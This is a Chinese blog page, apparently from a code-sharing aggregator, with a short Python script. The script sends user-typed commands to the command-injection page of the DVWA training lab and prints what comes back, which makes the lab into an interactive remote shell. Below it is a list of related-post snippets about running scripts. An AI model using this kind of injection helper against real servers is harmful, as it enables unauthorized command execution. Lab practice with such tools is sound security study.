2. 程式人生 > 其它 >DVWA命令執行簡單指令碼

DVWA命令執行簡單指令碼

阿新 發佈:2021-02-11

技術標籤:python爬蟲python安全

import requests
from bs4 import BeautifulSoup

url = 'http://ip地址/dvwa/vulnerabilities/exec/'
def command_inject(command):
    Cookies = dict(security='low', PHPSESSID=' xxxxxxxx  ')

    payload = {
        "ip": command,
        "Submit": "Submit"
    }
 


    reponse = requests.post(url=url,cookies=Cookies,data=payload).text
    #例項化物件
    soup = BeautifulSoup(reponse,'lxml')
	#定位標籤
    content_tag = soup.find_all(name='pre')
	#列印命令執行結果
    for content in content_tag:
        print(content.string)

while 1:

    cmd = input('quit->>退出\n輸入執行命令:'
 
)
    if len(cmd) == 0:
        continue
    if cmd =='quit':
        break
    command_inject(cmd)

相關推薦

DVWA命令執行簡單指令碼

技術標籤:python爬蟲python安全 import requests from bs4 import BeautifulSoup url = \'http://ip地址/dvwa/vulnerabilities/exec/\'

命令執行Python指令碼時傳入引數的三種方式詳解

如果在執行python指令碼時需要傳入一些引數,例如gpus與batch_size,可以使用如下三種方式。

找Python安裝目錄,設定環境路徑以及在命令執行python指令碼例項

第一點:找Python安裝目錄 方法一: 方法二: 輸入import sys print(sys.path) 化黑線處

[備忘錄]npm中執行shell指令碼提示: git commit -m "add " husky > npm run -s precommit (node v14.4.0) '.' 不是內部或外部命令,也不是可執行的程式 或批處理檔案。 husky > pre-commit hook failed (add --no-ver

[備忘錄]npm中執行shell指令碼提示: git commit -m "add " husky > npm run -s precommit (node v14.4.0)\'.\' 不是內部或外部命令,也不是可執行的程式 或批處理檔案。husky > pre-commit hook fa

Jmeter如何基於命令執行jmx指令碼

效能測試過程中,如果進行大量的併發時,介面容易卡死。 通過非GUI(命令列)的方式是個不錯的選擇。

web: php 執行第三方命令或者shell指令碼

今天在web-php後端指令碼執行外部shell指令碼,使用了相對路徑 ./../xx.sh 但是執行不成功,後來換成了絕對路徑執行成功了,

Shell指令碼中$0、$?、$!、$$、$*、$#、$@等的意義以及linux命令執行返回值代表意義

Shell指令碼中$0、$?、$!、$$、$*、$#、$@等的意義以及linux命令執行返回值意義 (1) Shell指令碼中$0、$?、$!、$$、$*、$#、$@等的意義說明

詳解python命令提示符視窗下如何執行python指令碼

以arcgispro的python指令碼為例在arcgispro自帶的python視窗下執行python指令碼 需求:

jenkins 執行RF指令碼時,提示pybot.bat不是內部命令

1、D:\\Python37\\Scripts下缺少pybot.bat檔案,在該目錄下新增該檔案 2、pybot.bat檔案內容如下

DVWA大通關(二、命令執行

命令執行介紹 Command Injection,即命令注入,是指通過提交惡意構造的引數破壞命令語句結構,從而達到執行惡意命令的目的。

命令執行airtest指令碼常用命令

常用命令舉例 1.連結模擬器,執行airtest指令碼,並將日誌輸出到指定目錄“airtest run path\\Activity.air --device **** --log path”

xshell 執行sql 指令碼命令

技術標籤:SQLshelllinuxmysql 第一 先登入mysql 最好使用root使用者 ,不然檔案會有許可權回車,輸入密碼進入到mysql選擇你要使用的是哪個庫,決定你sql指令碼執行到該庫中 命令

在postgreSQL中執行sql指令碼和pg_restore命令方式

今天踩坑了,把powerdesign生成的sql指令碼檔案,用pg_restore命令一直執行。。。

命令列和shell指令碼中使用mysql執行sql指令碼

技術標籤:運維mysqlshell資料庫sql 平時寫小量的sql直接連線客戶端在sql shell裡面執行很方便,但是有時候使用場景是sql指令碼很大,或者是需要配合shell指令碼使用那麼就只能通過sql指令碼了。

指令碼命令執行burp

昨天釋出了一篇關於burp的安裝教程,才想起來忘記了一件很重要的事情,就是如果我們要執行burp,每次都要去找到******然後開啟run才能執行,這樣很不方便,那有沒有便捷一點的方法呢?當然有,只要編寫一個bat就可以

ctfshow-web入門命令執行-web40/web41(附python指令碼)

web40 別看這裡過濾了這麼多,其實他過濾的括號是中文括號,這裡我開始納悶了好久

dotnet專案執行shell指令碼實現簡單的自動化部署

不要k8s、不要docker、不要Jenkins,只要一個部署指令碼,只是一個小專案單臺伺服器,實現提交程式碼自動執行指令碼,拉程式碼構建部署專案。

簡單瞭解WEB漏洞-RCE程式碼及命令執行漏洞

​ 在Web應用中有時候程式設計師為了考慮靈活性、簡潔性,會在程式碼呼叫程式碼或命令執行函式去處理。比如當應用在呼叫一些能將字串轉化成程式碼的函式時,沒有考慮使用者是否能控制這個字串將造成程式碼執行漏洞。

adb執行簡單命令,用於刷頁面訪問次數

::連線模擬器 adb connect 127.0.0.1:21523 timeout /t 3 /nobreak ::整體執行多少輪,每執行一輪,重啟一次APP

node.js在Linux下執行shell命令、.sh指令碼

首先,引入子程序模組 varprocess=require(\'child_process\'); 執行shell命令 呼叫該模組暴露出來的方法exec